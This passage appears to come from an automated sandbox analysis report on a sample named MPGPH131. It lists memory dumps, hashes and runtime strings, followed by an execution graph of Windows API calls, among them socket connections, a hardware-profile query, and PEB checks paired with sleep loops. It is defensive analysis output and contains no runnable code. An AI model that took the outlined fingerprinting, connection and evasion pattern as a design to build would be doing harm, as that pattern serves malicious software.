                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2659868963-1866435925
                                  • Opcode ID: 46c5e69cfa72c0f8b2ece5bbebf8024a1e3c44dffe1bbeaa2a6dba273868ec52
                                  • Instruction ID: 67546f197f3e11b98936be54c3cee34a6c83147bb74e58729a84502d60d2e73f
                                  • Opcode Fuzzy Hash: 46c5e69cfa72c0f8b2ece5bbebf8024a1e3c44dffe1bbeaa2a6dba273868ec52
                                  • Instruction Fuzzy Hash: BB41D8B2900214AFCB14DF5CD845BAEBBF8EF49710F14857AF919E7741E774AA048BA0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A23E7F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2659868963-1866435925
                                  • Opcode ID: c7e352f8c7829c4aa3731c036376889265933d0bc91bf71a7a2c10ad613fe142
                                  • Instruction ID: 075e09200c7e0ff3f113926b7b8cc7257ebc2ed375f766e92b029fbac1115e34
                                  • Opcode Fuzzy Hash: c7e352f8c7829c4aa3731c036376889265933d0bc91bf71a7a2c10ad613fe142
                                  • Instruction Fuzzy Hash: 3921EBB39003156FCB14EF5CE805BA6B7F8AF05310F18887AFA6897641E774EA14CB95
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A27340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: parse error$parse_error
                                  • API String ID: 2659868963-1820534363
                                  • Opcode ID: 11ccaa8c6ebb6a61c6e46303caf5fb4812212a756c602575f674647510076497
                                  • Instruction ID: f16de575762f1d08cafc519b6641e8dee7674a5916db6d504cfeb3f819a43f06
                                  • Opcode Fuzzy Hash: 11ccaa8c6ebb6a61c6e46303caf5fb4812212a756c602575f674647510076497
                                  • Instruction Fuzzy Hash: 8BE160709042188FDB18CF68D985B9DBBF1FF49300F2482A9E419EB792D7749A85CF51
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A26F11
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A26F20
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: [json.exception.
                                  • API String ID: 4194217158-791563284
                                  • Opcode ID: 68304d1e9aa675b444076e5cccc6eb4774de033f66e11ff63697c237b314d1fa
                                  • Instruction ID: 2ace2e93c2d10f4cf5238c2f0110c62c2117403875e2d56bd185a894a95a7433
                                  • Opcode Fuzzy Hash: 68304d1e9aa675b444076e5cccc6eb4774de033f66e11ff63697c237b314d1fa
                                  • Instruction Fuzzy Hash: 9391C570A012189FDB18CF6CD984B9EBBF6FF49300F20856DE415AB792D775A941CB50
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00A9E491
                                  Strings
                                  • type must be boolean, but is , xrefs: 00A9E582
                                  • type must be string, but is , xrefs: 00A9E4F8
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: type must be boolean, but is $type must be string, but is
                                  • API String ID: 118556049-436076039
                                  • Opcode ID: a36e9888bbe68c14138cbd4c6609129b146156e1ba4c066c2b53cef137eb5d62
                                  • Instruction ID: 064ee365e07999a85fb30b18bf8d3dab7f3e7649a1eb1350690e3812f0cb61ed
                                  • Opcode Fuzzy Hash: a36e9888bbe68c14138cbd4c6609129b146156e1ba4c066c2b53cef137eb5d62
                                  • Instruction Fuzzy Hash: CF415EB1A00248AFDB14EBA4E902B9EB7E8DB14710F1446B4F419D7792EB35EE44C792

                                  Execution Graph

                                  Execution Coverage:3.2%
                                  Dynamic/Decrypted Code Coverage:0.9%
                                  Signature Coverage:0%
                                  Total number of Nodes:666
                                  Total number of Limit Nodes:71
                                  execution_graph 18879 a3e0a0 WSAStartup 18880 a3e0d8 18879->18880 18884 a3e1a7 18879->18884 18881 a3e175 socket 18880->18881 18880->18884 18882 a3e18b connect 18881->18882 18881->18884 18883 a3e19d closesocket 18882->18883 18882->18884 18883->18881 18883->18884 18957 5590157 18958 5590186 18957->18958 18961 5590265 GetCurrentHwProfileW 18958->18961 18962 559027e 18961->18962 18892 b0d168 18893 b0d17b ___std_exception_copy 18892->18893 18898 b0cf4a 18893->18898 18895 b0d190 18896 b044dc ___std_exception_copy RtlAllocateHeap 18895->18896 18897 b0d19d 18896->18897 18899 b0cf80 18898->18899 18900 b0cf58 18898->18900 18899->18895 18900->18899 18901 b0cf65 18900->18901 18902 b0cf87 18900->18902 18904 b04723 ___std_exception_copy RtlAllocateHeap 18901->18904 18906 b0cea3 18902->18906 18904->18899 18905 b0cfbf 18905->18895 18907 b0ceaf __fread_nolock 18906->18907 18910 b0cefe 18907->18910 18909 b0ceca 18909->18905 18917 b18644 18910->18917 18937 b18606 18917->18937 18919 b18655 18920 b0cf16 18919->18920 18921 b16e2d std::_Locinfo::_Locinfo_ctor 2 API calls 18919->18921 18924 b0cfc1 18920->18924 18922 b186ae 18921->18922 18923 b16db3 __freea RtlAllocateHeap 18922->18923 18923->18920 18925 b0cf34 18924->18925 18928 b0cfd3 18924->18928 18933 b186ef 18925->18933 18926 b0cfe1 18927 b04723 ___std_exception_copy RtlAllocateHeap 18926->18927 18927->18925 18928->18925 18928->18926 18930 b0d017 std::locale::_Init 18928->18930 18929 b055d3 4 API calls 18929->18930 18930->18925 18930->18929 18931 b15f82 __fread_nolock RtlAllocateHeap 18930->18931 18932 b1538b 4 API calls 18930->18932 18931->18930 18932->18930 18934 b0cf40 18933->18934 18935 b186fa 18933->18935 18934->18909 18935->18934 18936 b055d3 4 API calls 18935->18936 18936->18934 18938 b18612 18937->18938 18939 b1863c 18938->18939 18940 b15f82 __fread_nolock RtlAllocateHeap 18938->18940 18939->18919 18941 b1862d 18940->18941 18942 b20d44 __fread_nolock RtlAllocateHeap 18941->18942 18943 b18633 18942->18943 18943->18919 18946 b15d2c 18947 b15d35 __dosmaperr 18946->18947 18948 b163f3 __dosmaperr RtlAllocateHeap 18947->18948 18955 b15d4c 18947->18955 18949 b15d79 __dosmaperr 18948->18949 18950 b15d81 __dosmaperr 18949->18950 18951 b15db9 18949->18951 18953 b16db3 __freea RtlAllocateHeap 18950->18953 18952 b15a09 __dosmaperr RtlAllocateHeap 18951->18952 18954 b15dc4 18952->18954 18953->18955 18956 b16db3 __freea RtlAllocateHeap 18954->18956 18956->18955 18885 a83a40 18888 a83a55 18885->18888 18886 a83b28 GetPEB 18886->18888 18887 a83a73 GetPEB 18887->18888 18888->18886 18888->18887 18889 a83b9d Sleep 18888->18889 18890 a83ae8 Sleep 18888->18890 18891 a83bc7 18888->18891 18889->18888 18890->18888 18154 a2a210 18187 aff290 18154->18187 18156 a2a248 18192 a22ae0 18156->18192 18158 a2a28b 18208 b05362 18158->18208 18161 a2a377 18165 a2a34e 18165->18161 18237 b047b0 18165->18237 18168 b09136 4 API calls 18169 a2a2fc 18168->18169 18174 a2a318 18169->18174 18223 a8cf60 18169->18223 18228 b0dbdf 18174->18228 18189 a221d0 Concurrency::cancel_current_task std::_Xinvalid_argument ___std_exception_copy std::_Facet_Register 18187->18189 18188 aff2af 18188->18156 18189->18188 18240 b00651 18189->18240 18193 a22ba5 18192->18193 18199 a22af6 18192->18199 18458 a22270 18193->18458 18195 a22b02 std::locale::_Init 18195->18158 18196 a22b2a 18200 aff290 std::_Facet_Register RtlAllocateHeap 18196->18200 18197 a22baa 18468 a221d0 18197->18468 18199->18195 18199->18196 18202 a22b65 18199->18202 18203 a22b6e 18199->18203 18201 a22b3d 18200->18201 18204 b047b0 RtlAllocateHeap 18201->18204 18207 a22b46 std::locale::_Init 18201->18207 18202->18196 18202->18197 18206 aff290 std::_Facet_Register RtlAllocateHeap 18203->18206 18203->18207 18205 a22bb4 18204->18205 18206->18207 18207->18158 18481 b052a0 18208->18481 18210 a2a2d7 18210->18165 18211 b09136 18210->18211 18212 b09149 ___std_exception_copy 18211->18212 18505 b08e8d 18212->18505 18214 b0915e 18215 b044dc ___std_exception_copy RtlAllocateHeap 18214->18215 18216 a2a2ea 18215->18216 18217 b04eeb 18216->18217 18218 b04efe ___std_exception_copy 18217->18218 18638 b04801 18218->18638 18220 b04f0a 18221 b044dc ___std_exception_copy RtlAllocateHeap 18220->18221 18222 a2a2f0 18221->18222 18222->18168 18224 a8cfa7 18223->18224 18227 a8cf78 __fread_nolock 18223->18227 18686 a90560 18224->18686 18226 a8cfba 18226->18174 18227->18174 18701 b0dbfc 18228->18701 18230 a2a348 18231 b08be8 18230->18231 18232 b08bfb ___std_exception_copy 18231->18232 18825 b08ac3 18232->18825 18234 b08c07 18235 b044dc ___std_exception_copy RtlAllocateHeap 18234->18235 18236 b08c13 18235->18236 18236->18165 18238 b046ec ___std_exception_copy RtlAllocateHeap 18237->18238 18239 b047bf __Getctype 18238->18239 18241 a22213 18240->18241 18242 b0065e ___std_exception_copy 18240->18242 18241->18156 18242->18241 18243 b0068b 18242->18243 18246 b156b8 18242->18246 18255 b0d7d6 18243->18255 18247 b156d4 18246->18247 18248 b156c6 18246->18248 18258 b0d23f 18247->18258 18248->18247 18253 b156ec 18248->18253 18250 b156dc 18261 b047a0 18250->18261 18252 b156e6 18252->18243 18253->18252 18254 b0d23f __dosmaperr RtlAllocateHeap 18253->18254 18254->18250 18256 b16db3 __freea RtlAllocateHeap 18255->18256 18257 b0d7ee 18256->18257 18257->18241 18264 b15d2c 18258->18264 18369 b046ec 18261->18369 18265 b15d35 __dosmaperr 18264->18265 18273 b0d244 18265->18273 18275 b163f3 18265->18275 18267 b15d79 __dosmaperr 18268 b15d81 __dosmaperr 18267->18268 18269 b15db9 18267->18269 18279 b16db3 18268->18279 18283 b15a09 18269->18283 18273->18250 18274 b16db3 __freea RtlAllocateHeap 18274->18273 18278 b16400 __dosmaperr std::_Facet_Register 18275->18278 18276 b1642b RtlAllocateHeap 18277 b1643e __dosmaperr 18276->18277 18276->18278 18277->18267 18278->18276 18278->18277 18280 b16de8 18279->18280 18281 b16dbe __dosmaperr 18279->18281 18280->18273 18281->18280 18282 b0d23f __dosmaperr RtlAllocateHeap 18281->18282 18282->18280 18284 b15a77 __dosmaperr 18283->18284 18287 b159af 18284->18287 18286 b15aa0 18286->18274 18288 b159bb __fread_nolock std::_Lockit::_Lockit 18287->18288 18291 b15b90 18288->18291 18290 b159dd __dosmaperr 18290->18286 18292 b15bc6 __Getctype 18291->18292 18293 b15b9f __Getctype 18291->18293 18292->18290 18293->18292 18295 b1f2a7 18293->18295 18296 b1f327 18295->18296 18299 b1f2bd 18295->18299 18298 b16db3 __freea RtlAllocateHeap 18296->18298 18321 b1f375 18296->18321 18300 b1f349 18298->18300 18299->18296 18303 b16db3 __freea RtlAllocateHeap 18299->18303 18305 b1f2f0 18299->18305 18301 b16db3 __freea RtlAllocateHeap 18300->18301 18304 b1f35c 18301->18304 18302 b1f383 18311 b1f3e3 18302->18311 18320 b16db3 RtlAllocateHeap __freea 18302->18320 18307 b1f2e5 18303->18307 18308 b16db3 __freea RtlAllocateHeap 18304->18308 18309 b16db3 __freea RtlAllocateHeap 18305->18309 18322 b1f312 18305->18322 18306 b16db3 __freea RtlAllocateHeap 18310 b1f31c 18306->18310 18323 b1e5ab 18307->18323 18314 b1f36a 18308->18314 18315 b1f307 18309->18315 18316 b16db3 __freea RtlAllocateHeap 18310->18316 18312 b16db3 __freea RtlAllocateHeap 18311->18312 18317 b1f3e9 18312->18317 18318 b16db3 __freea RtlAllocateHeap 18314->18318 18351 b1ea0a 18315->18351 18316->18296 18317->18292 18318->18321 18320->18302 18363 b1f418 18321->18363 18322->18306 18324 b1e5bc 18323->18324 18350 b1e6a5 18323->18350 18325 b1e5cd 18324->18325 18326 b16db3 __freea RtlAllocateHeap 18324->18326 18327 b1e5df 18325->18327 18328 b16db3 __freea RtlAllocateHeap 18325->18328 18326->18325 18329 b1e5f1 18327->18329 18330 b16db3 __freea RtlAllocateHeap 18327->18330 18328->18327 18331 b1e603 18329->18331 18333 b16db3 __freea RtlAllocateHeap 18329->18333 18330->18329 18332 b1e615 18331->18332 18334 b16db3 __freea RtlAllocateHeap 18331->18334 18335 b1e627 18332->18335 18336 b16db3 __freea RtlAllocateHeap 18332->18336 18333->18331 18334->18332 18337 b1e639 18335->18337 18338 b16db3 __freea RtlAllocateHeap 18335->18338 18336->18335 18339 b16db3 __freea RtlAllocateHeap 18337->18339 18343 b1e64b 18337->18343 18338->18337 18339->18343 18340 b16db3 __freea RtlAllocateHeap 18342 b1e65d 18340->18342 18341 b1e66f 18345 b1e681 18341->18345 18346 b16db3 __freea RtlAllocateHeap 18341->18346 18342->18341 18344 b16db3 __freea RtlAllocateHeap 18342->18344 18343->18340 18343->18342 18344->18341 18347 b1e693 18345->18347 18348 b16db3 __freea RtlAllocateHeap 18345->18348 18346->18345 18349 b16db3 __freea RtlAllocateHeap 18347->18349 18347->18350 18348->18347 18349->18350 18350->18305 18352 b1ea17 18351->18352 18362 b1ea6f 18351->18362 18353 b16db3 __freea RtlAllocateHeap 18352->18353 18354 b1ea27 18352->18354 18353->18354 18355 b16db3 __freea RtlAllocateHeap 18354->18355 18356 b1ea39 18354->18356 18355->18356 18357 b1ea4b 18356->18357 18358 b16db3 __freea RtlAllocateHeap 18356->18358 18359 b1ea5d 18357->18359 18360 b16db3 __freea RtlAllocateHeap 18357->18360 18358->18357 18361 b16db3 __freea RtlAllocateHeap 18359->18361 18359->18362 18360->18359 18361->18362 18362->18322 18364 b1f425 18363->18364 18368 b1f444 18363->18368 18365 b1ef31 __Getctype RtlAllocateHeap 18364->18365 18364->18368 18366 b1f43e 18365->18366 18367 b16db3 __freea RtlAllocateHeap 18366->18367 18367->18368 18368->18302 18370 b046fe ___std_exception_copy 18369->18370 18375 b04723 18370->18375 18372 b04716 18382 b044dc 18372->18382 18376 b04733 18375->18376 18378 b0473a ___std_exception_copy __Getctype 18375->18378 18388 b04541 18376->18388 18379 b04748 18378->18379 18380 b046ec ___std_exception_copy RtlAllocateHeap 18378->18380 18379->18372 18381 b047ac 18380->18381 18381->18372 18383 b044e8 18382->18383 18385 b044ff 18383->18385 18403 b04587 18383->18403 18386 b04587 ___std_exception_copy RtlAllocateHeap 18385->18386 18387 b04512 18385->18387 18386->18387 18387->18252 18389 b04550 18388->18389 18392 b15ddd 18389->18392 18393 b15df0 __dosmaperr 18392->18393 18394 b04572 18393->18394 18395 b163f3 __dosmaperr RtlAllocateHeap 18393->18395 18394->18378 18396 b15e20 __dosmaperr 18395->18396 18397 b15e28 __dosmaperr 18396->18397 18398 b15e5c 18396->18398 18400 b16db3 __freea RtlAllocateHeap 18397->18400 18399 b15a09 __dosmaperr RtlAllocateHeap 18398->18399 18401 b15e67 18399->18401 18400->18394 18402 b16db3 __freea RtlAllocateHeap 18401->18402 18402->18394 18404 b04591 18403->18404 18405 b0459a 18403->18405 18406 b04541 ___std_exception_copy RtlAllocateHeap 18404->18406 18405->18385 18407 b04596 18406->18407 18407->18405 18410 b10259 18407->18410 18411 b1025e std::locale::_Setgloballocale 18410->18411 18415 b10269 std::locale::_Setgloballocale 18411->18415 18416 b1c7c6 18411->18416 18437 b0f224 18415->18437 18419 b1c7d2 __fread_nolock 18416->18419 18417 b15d2c __dosmaperr RtlAllocateHeap 18423 b1c803 std::locale::_Setgloballocale 18417->18423 18418 b1c822 18420 b0d23f __dosmaperr RtlAllocateHeap 18418->18420 18419->18417 18419->18418 18419->18423 18424 b1c834 std::_Lockit::_Lockit std::locale::_Setgloballocale 18419->18424 18421 b1c827 18420->18421 18422 b047a0 ___std_exception_copy RtlAllocateHeap 18421->18422 18436 b1c80c 18422->18436 18423->18418 18423->18424 18423->18436 18425 b1c9a4 std::_Lockit::~_Lockit 18424->18425 18426 b1c8a7 18424->18426 18427 b1c8d5 std::locale::_Setgloballocale 18424->18427 18428 b0f224 std::locale::_Setgloballocale RtlAllocateHeap 18425->18428 18426->18427 18440 b15bdb 18426->18440 18431 b15bdb __Getctype RtlAllocateHeap 18427->18431 18434 b1c92a 18427->18434 18427->18436 18429 b1c9b7 18428->18429 18431->18434 18433 b15bdb __Getctype RtlAllocateHeap 18433->18427 18435 b15bdb __Getctype RtlAllocateHeap 18434->18435 18434->18436 18435->18436 18436->18415 18454 b0f094 18437->18454 18439 b0f235 18441 b15be4 __dosmaperr 18440->18441 18442 b163f3 __dosmaperr RtlAllocateHeap 18441->18442 18451 b15bfb 18441->18451 18443 b15c28 __dosmaperr 18442->18443 18446 b15c30 __dosmaperr 18443->18446 18447 b15c68 18443->18447 18444 b15c8b 18444->18433 18445 b10259 __Getctype RtlAllocateHeap 18448 b15c95 18445->18448 18449 b16db3 __freea RtlAllocateHeap 18446->18449 18450 b15a09 __dosmaperr RtlAllocateHeap 18447->18450 18449->18451 18452 b15c73 18450->18452 18451->18444 18451->18445 18453 b16db3 __freea RtlAllocateHeap 18452->18453 18453->18451 18455 b0f0c1 std::locale::_Setgloballocale 18454->18455 18456 b0ef23 std::locale::_Setgloballocale RtlAllocateHeap 18455->18456 18457 b0f10a std::locale::_Setgloballocale 18456->18457 18457->18439 18472 afd6e9 18458->18472 18469 a221de Concurrency::cancel_current_task std::_Xinvalid_argument 18468->18469 18470 b00651 ___std_exception_copy RtlAllocateHeap 18469->18470 18471 a22213 18470->18471 18471->18201 18475 afd4af 18472->18475 18474 afd6fa std::_Xinvalid_argument 18478 a23010 18475->18478 18479 b00651 ___std_exception_copy RtlAllocateHeap 18478->18479 18480 a2303d 18479->18480 18480->18474 18484 b052ac __fread_nolock 18481->18484 18482 b052b3 18483 b0d23f __dosmaperr RtlAllocateHeap 18482->18483 18485 b052b8 18483->18485 18484->18482 18486 b052d3 18484->18486 18487 b047a0 ___std_exception_copy RtlAllocateHeap 18485->18487 18488 b052e5 18486->18488 18489 b052d8 18486->18489 18494 b052c3 18487->18494 18495 b16688 18488->18495 18490 b0d23f __dosmaperr RtlAllocateHeap 18489->18490 18490->18494 18492 b052ee 18493 b0d23f __dosmaperr RtlAllocateHeap 18492->18493 18492->18494 18493->18494 18494->18210 18496 b16694 __fread_nolock std::_Lockit::_Lockit 18495->18496 18499 b1672c 18496->18499 18498 b166af 18498->18492 18500 b1674f __fread_nolock 18499->18500 18501 b163f3 __dosmaperr RtlAllocateHeap 18500->18501 18504 b16795 __fread_nolock 18500->18504 18502 b167b0 18501->18502 18503 b16db3 __freea RtlAllocateHeap 18502->18503 18503->18504 18504->18498 18508 b08e99 __fread_nolock 18505->18508 18506 b08e9f 18507 b04723 ___std_exception_copy RtlAllocateHeap 18506->18507 18511 b08eba 18507->18511 18508->18506 18509 b08ee2 __fread_nolock 18508->18509 18512 b09010 18509->18512 18511->18214 18513 b09023 18512->18513 18514 b09036 18512->18514 18513->18511 18521 b08f37 18514->18521 18516 b090e7 18516->18511 18518 b09059 18518->18516 18525 b055d3 18518->18525 18522 b08f48 18521->18522 18524 b08fa0 18521->18524 18522->18524 18534 b0e13d 18522->18534 18524->18518 18526 b055ec 18525->18526 18530 b05613 18525->18530 18526->18530 18561 b15f82 18526->18561 18528 b05608 18568 b1538b 18528->18568 18531 b0e17d 18530->18531 18532 b0e05c __fread_nolock 2 API calls 18531->18532 18533 b0e196 18532->18533 18533->18516 18535 b0e151 ___std_exception_copy 18534->18535 18540 b0e05c 18535->18540 18537 b0e166 18538 b044dc ___std_exception_copy RtlAllocateHeap 18537->18538 18539 b0e175 18538->18539 18539->18524 18545 b1a6de 18540->18545 18542 b0e06e 18543 b0e08a SetFilePointerEx 18542->18543 18544 b0e076 __fread_nolock 18542->18544 18543->18544 18544->18537 18546 b1a700 18545->18546 18547 b1a6eb 18545->18547 18549 b0d22c __dosmaperr RtlAllocateHeap 18546->18549 18553 b1a725 18546->18553 18558 b0d22c 18547->18558 18551 b1a730 18549->18551 18554 b0d23f __dosmaperr RtlAllocateHeap 18551->18554 18552 b0d23f __dosmaperr RtlAllocateHeap 18555 b1a6f8 18552->18555 18553->18542 18556 b1a738 18554->18556 18555->18542 18557 b047a0 ___std_exception_copy RtlAllocateHeap 18556->18557 18557->18555 18559 b15d2c __dosmaperr RtlAllocateHeap 18558->18559 18560 b0d231 18559->18560 18560->18552 18562 b15fa3 18561->18562 18563 b15f8e 18561->18563 18562->18528 18564 b0d23f __dosmaperr RtlAllocateHeap 18563->18564 18565 b15f93 18564->18565 18566 b047a0 ___std_exception_copy RtlAllocateHeap 18565->18566 18567 b15f9e 18566->18567 18567->18528 18570 b15397 __fread_nolock 18568->18570 18569 b153d8 18571 b04723 ___std_exception_copy RtlAllocateHeap 18569->18571 18570->18569 18572 b1541e 18570->18572 18573 b1539f 18570->18573 18571->18573 18572->18573 18575 b1549c 18572->18575 18573->18530 18576 b154c4 18575->18576 18588 b154e7 __fread_nolock 18575->18588 18577 b154c8 18576->18577 18579 b15523 18576->18579 18578 b04723 ___std_exception_copy RtlAllocateHeap 18577->18578 18578->18588 18580 b15541 18579->18580 18581 b0e17d 2 API calls 18579->18581 18589 b14fe1 18580->18589 18581->18580 18584 b155a0 18586 b15609 WriteFile 18584->18586 18584->18588 18585 b15559 18585->18588 18594 b14bb2 18585->18594 18586->18588 18588->18573 18600 b20d44 18589->18600 18591 b15021 18591->18584 18591->18585 18592 b14ff3 18592->18591 18609 b09d10 18592->18609 18595 b14c1a 18594->18595 18596 b09d10 std::_Locinfo::_Locinfo_ctor 2 API calls 18595->18596 18599 b14c2b std::locale::_Init std::_Locinfo::_Locinfo_ctor 18595->18599 18596->18599 18597 b184be RtlAllocateHeap RtlAllocateHeap 18597->18599 18598 b14ee1 _ValidateLocalCookies 18598->18588 18599->18597 18599->18598 18601 b20d51 18600->18601 18602 b20d5e 18600->18602 18603 b0d23f __dosmaperr RtlAllocateHeap 18601->18603 18605 b20d6a 18602->18605 18606 b0d23f __dosmaperr RtlAllocateHeap 18602->18606 18604 b20d56 18603->18604 18604->18592 18605->18592 18607 b20d8b 18606->18607 18608 b047a0 ___std_exception_copy RtlAllocateHeap 18607->18608 18608->18604 18610 b04587 ___std_exception_copy RtlAllocateHeap 18609->18610 18611 b09d20 18610->18611 18616 b15ef3 18611->18616 18617 b09d3d 18616->18617 18618 b15f0a 18616->18618 18620 b15f51 18617->18620 18618->18617 18624 b1f4f3 18618->18624 18621 b15f68 18620->18621 18623 b09d4a 18620->18623 18621->18623 18633 b1d81e 18621->18633 18623->18591 18625 b1f4ff __fread_nolock 18624->18625 18626 